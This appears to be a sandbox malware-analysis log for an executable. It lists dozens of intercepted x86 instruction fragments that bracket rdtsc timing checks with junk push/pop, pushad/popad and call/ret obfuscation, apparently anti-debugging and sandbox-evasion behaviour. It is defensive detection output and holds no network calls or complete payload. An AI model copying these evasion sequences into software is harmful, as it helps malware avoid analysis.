                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 65EADB second address: 65EAE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6206AF second address: 6206CB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0668FAD1F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0668FAD1FCh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6206CB second address: 62070A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F06687C5EF3h 0x0000000e popad 0x0000000f nop 0x00000010 mov dword ptr [ebp+122D2481h], esi 0x00000016 lea eax, dword ptr [ebp+1248C471h] 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push esi 0x00000021 pop esi 0x00000022 jnp 00007F06687C5EE6h 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62070A second address: 62073A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F0668FAD1F6h 0x00000009 jmp 00007F0668FAD1FDh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push edx 0x00000014 jmp 00007F0668FAD1FFh 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d pop esi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62073A second address: 62073E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 620827 second address: 62082C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62082C second address: 620832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 620832 second address: 620836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 620CAF second address: 620CE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F06687C5EF8h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F06687C5EF3h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 620D63 second address: 620D67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 620D67 second address: 620DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F06687C5EF0h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edi 0x00000011 jno 00007F06687C5EECh 0x00000017 pop edi 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b jmp 00007F06687C5EF3h 0x00000020 js 00007F06687C5EE8h 0x00000026 push edi 0x00000027 pop edi 0x00000028 popad 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d jbe 00007F06687C5EEEh 0x00000033 push ecx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62120F second address: 621278 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD205h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007F0668FAD202h 0x00000010 ja 00007F0668FAD1FCh 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F0668FAD1F8h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 mov cx, ax 0x00000034 movzx edi, cx 0x00000037 push 00000004h 0x00000039 add dword ptr [ebp+122D29BBh], ecx 0x0000003f mov edx, dword ptr [ebp+122D362Eh] 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 pushad 0x0000004a popad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 621278 second address: 62127D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62127D second address: 621283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 621A51 second address: 621A5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F06687C5EE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 65F0EE second address: 65F11A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD202h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop ecx 0x0000000f push ebx 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007F0668FAD1FCh 0x00000017 pop ebx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 65F11A second address: 65F12A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F06687C5EE6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 65F263 second address: 65F267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 65F7C4 second address: 65F7EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jg 00007F06687C5EECh 0x0000000b jl 00007F06687C5EE6h 0x00000011 pushad 0x00000012 push ecx 0x00000013 jno 00007F06687C5EE6h 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c je 00007F06687C5EECh 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 66513D second address: 665146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 667FE2 second address: 667FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F06687C5EEAh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 667FF4 second address: 668009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d jng 00007F0668FAD1FCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 668009 second address: 66801D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F06687C5EECh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 66801D second address: 668021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 66818B second address: 6681A5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jns 00007F06687C5EE6h 0x00000013 popad 0x00000014 pop esi 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6681A5 second address: 6681AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6681AB second address: 6681AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 668350 second address: 668356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 668356 second address: 668364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007F06687C5EE6h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6684A8 second address: 6684AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6684AD second address: 6684CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06687C5EF7h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5D6389 second address: 5D63A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD1FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jl 00007F0668FAD1F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5D63A4 second address: 5D63C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 ja 00007F06687C5EF2h 0x0000000d je 00007F06687C5EEEh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 66CAC9 second address: 66CB08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0668FAD208h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jng 00007F0668FAD1F6h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 ja 00007F0668FAD205h 0x0000001d jmp 00007F0668FAD1FFh 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 66CB08 second address: 66CB0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 66CF1D second address: 66CF21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 66CF21 second address: 66CF25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 66CF25 second address: 66CF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0668FAD1F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0668FAD1FFh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 66D3AC second address: 66D3D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EEDh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F06687C5EF0h 0x00000011 pop esi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 66D3D6 second address: 66D3DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 66D3DC second address: 66D3E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 66D3E0 second address: 66D3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0668FAD1F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F0668FAD1FCh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 66D3FC second address: 66D400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 66D400 second address: 66D404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 672137 second address: 672142 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6722E5 second address: 6722EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62143C second address: 621440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 621440 second address: 62145E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0668FAD204h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62145E second address: 6214F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F06687C5EE8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 call 00007F06687C5EEAh 0x00000029 sbb cx, DC56h 0x0000002e pop ecx 0x0000002f mov dx, 4D41h 0x00000033 mov ebx, dword ptr [ebp+1248C4B0h] 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F06687C5EE8h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 0000001Ah 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 sbb ecx, 26F31E33h 0x00000059 jo 00007F06687C5EEBh 0x0000005f add dx, B3B4h 0x00000064 add eax, ebx 0x00000066 push ebx 0x00000067 mov edi, dword ptr [ebp+122D34F4h] 0x0000006d pop edi 0x0000006e nop 0x0000006f pushad 0x00000070 push eax 0x00000071 push edx 0x00000072 jne 00007F06687C5EE6h 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6214F8 second address: 621518 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 621518 second address: 62158D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 jmp 00007F06687C5EEDh 0x0000000e pop ecx 0x0000000f jp 00007F06687C5EECh 0x00000015 popad 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F06687C5EE8h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 push 00000004h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007F06687C5EE8h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 00000018h 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d sub di, BB10h 0x00000052 nop 0x00000053 push ebx 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 621537 second address: 62158D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebp 0x00000009 call 00007F0668FAD1F8h 0x0000000e pop ebp 0x0000000f mov dword ptr [esp+04h], ebp 0x00000013 add dword ptr [esp+04h], 0000001Ch 0x0000001b inc ebp 0x0000001c push ebp 0x0000001d ret 0x0000001e pop ebp 0x0000001f ret 0x00000020 push 00000004h 0x00000022 push 00000000h 0x00000024 push ebp 0x00000025 call 00007F0668FAD1F8h 0x0000002a pop ebp 0x0000002b mov dword ptr [esp+04h], ebp 0x0000002f add dword ptr [esp+04h], 00000018h 0x00000037 inc ebp 0x00000038 push ebp 0x00000039 ret 0x0000003a pop ebp 0x0000003b ret 0x0000003c sub di, BB10h 0x00000041 nop 0x00000042 push ebx 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67258D second address: 6725A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F06687C5EECh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6725A2 second address: 6725A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67319A second address: 67319E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67319E second address: 6731B0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0668FAD1F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6731B0 second address: 6731CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06687C5EF9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6731CF second address: 6731D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6765FD second address: 676601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 676601 second address: 676626 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0668FAD208h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6762D5 second address: 6762EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F06687C5EE6h 0x0000000c popad 0x0000000d je 00007F06687C5EEEh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67E34C second address: 67E350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67E48B second address: 67E51D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F06687C5EF2h 0x0000000e pushad 0x0000000f jmp 00007F06687C5EF8h 0x00000014 jl 00007F06687C5EE6h 0x0000001a jnc 00007F06687C5EE6h 0x00000020 push edx 0x00000021 pop edx 0x00000022 popad 0x00000023 jmp 00007F06687C5EF6h 0x00000028 popad 0x00000029 pushad 0x0000002a push eax 0x0000002b jmp 00007F06687C5EEFh 0x00000030 pop eax 0x00000031 jmp 00007F06687C5EEBh 0x00000036 push eax 0x00000037 push edx 0x00000038 js 00007F06687C5EE6h 0x0000003e jno 00007F06687C5EE6h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67E942 second address: 67E968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0668FAD209h 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67E968 second address: 67E9B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F06687C5EFBh 0x0000000c jnl 00007F06687C5F0Ah 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67EF8C second address: 67EF9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD1FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67EF9A second address: 67EFA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67EFA0 second address: 67EFA6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67EFA6 second address: 67EFC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F06687C5EF5h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67EFC5 second address: 67EFC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67F49C second address: 67F4CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06687C5EF6h 0x00000009 pushad 0x0000000a jmp 00007F06687C5EEDh 0x0000000f jg 00007F06687C5EE6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67F4CC second address: 67F4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F0668FAD1F6h 0x00000010 jmp 00007F0668FAD1FCh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67F4E8 second address: 67F50A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EECh 0x00000007 jo 00007F06687C5EE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnp 00007F06687C5EECh 0x00000015 jng 00007F06687C5EE6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67F50A second address: 67F50F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67F78D second address: 67F7A2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F06687C5EEEh 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67FFCC second address: 67FFD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67FFD0 second address: 67FFEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F06687C5EF5h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 67FFEE second address: 67FFF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
